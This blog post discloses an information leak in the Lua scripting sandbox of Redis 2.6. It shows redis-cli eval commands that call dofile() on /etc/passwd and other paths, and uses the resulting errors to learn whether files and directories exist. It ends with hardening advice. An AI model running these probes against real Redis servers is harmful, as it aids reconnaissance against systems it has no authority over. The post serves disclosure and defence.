Redis 2.6 was recently released by Antirez at the end of RedisConf. One of the major features that comes with 2.6 is embedded Lua scripting.
Even though the Lua sandbox within Redis has been very locked down to only the base library and a few others, we have found at least one way to abuse Lua to get some data from outside the sandbox.
There is a function to load and execute a file called dofile()
Given the fact that Lua scripts should perform atomically, this function shouldn’t actually exist in the sandbox. We have a pending pull request to remove this function.
The errors this function gives allow an attacker to determine if a file or directory exists or not. This might be useful in locating a web root or determining the operating system. Not a significant vulnerability in and of itself, but gives information to an attacker they would not otherwise have.
When a file doesn’t exist we get a very obvious “No such file or directory error”
net read 127.0.0.1:6379 id 1: -ERR Error running script (call to f_b5e5869caf1de9ffa1ae173bf46fef3024d3f987): cannot open /dev/a:No such file or directory
Here is an example of how to do this enumeration from a shell.
$ redis-cli -h localhost -p 6379 eval "dofile('/etc/passwd')" 0
(error) ERR Error running script (call to f_afdc51b5f9e34eced5fae459fc1d856af181aaf1): /etc/passwd:2: unexpected symbol near ‘#’
$ redis-cli -h localhost -p 6379 eval "dofile('/tmp')" 0
(error) ERR Error running script (call to f_70391feea8a62e239b3055c11b7d9d1d8c78db6e): cannot read /tmp:Is a directory
$ redis-cli -h localhost -p 6379 eval "dofile('/doesnotexist')" 0
(error) ERR Error running script (call to f_e84ccf03dc6b3547568096467afa7b3242ed108d): cannot open /doesnotexist: No such file or directory
Conclusion for penetration testers:
Keep an eye out for Redis servers on the network during your assessments
Conclusion for everyone else:
Keep your Redis server off the Internet by setting “bind 127.0.0.1” in the redis.conf file.
